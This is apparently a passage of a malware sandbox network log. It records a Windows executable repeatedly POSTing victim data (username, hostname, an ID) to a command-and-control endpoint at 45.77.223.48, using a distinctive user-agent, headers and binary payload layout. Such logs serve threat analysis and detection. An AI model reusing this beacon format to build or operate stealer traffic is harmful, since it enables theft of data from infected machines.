                                            Apr 26, 2024 04:43:10.652117968 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:11.509917974 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:10 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:11.509979963 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:11.518042088 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:11.518213987 CEST166INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74
                                            Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:11.518341064 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:11.518484116 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:11.518527985 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:11.518567085 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:11.518605947 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-
                                            Apr 26, 2024 04:43:11.518826962 CEST1289INData Raw: 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63 68 6f 72 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 69 6c 6c 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 7d 2e 77 70 2d 62 6c 6f 63
                                            Data Ascii: .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link{background-color:#f0f0f0;color:#444}.wp-block-social-links:not(.is-style-logos-only) .wp-social-link-ama


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            45192.168.2.44978845.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:11.850755930 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:12.038635969 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:12.917645931 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:11 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:12.917958975 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:12.934223890 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:12.939455032 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:12.939558983 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:12.939598083 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:12.940215111 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:12.940279961 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:12.940351009 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:13.106101036 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 20 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 7d 0a
                                            Data Ascii: <style id='wp-block-site-title-inline-css'>.wp-block-site-title a{color:inherit}</style><style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            46192.168.2.44978945.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:13.266385078 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:13.455580950 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:14.381149054 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:13 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:14.381249905 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:14.381290913 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:14.390116930 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:14.390353918 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:14.390393972 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:14.390532017 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:14.390885115 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:14.390933037 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:14.390974045 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            47192.168.2.44979045.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:14.708231926 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:14.896835089 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:15.810297966 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:14 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:15.810444117 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:15.810482025 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:15.821813107 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:15.822232962 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:15.822289944 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:15.822366953 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:15.822524071 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:15.822578907 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:15.822618008 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            48192.168.2.44979145.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:16.174844027 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:16.363396883 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:17.296164989 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:16 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:17.296226978 CEST64INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                            Apr 26, 2024 04:43:17.296262026 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:17.303306103 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:17.303770065 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:17.303811073 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
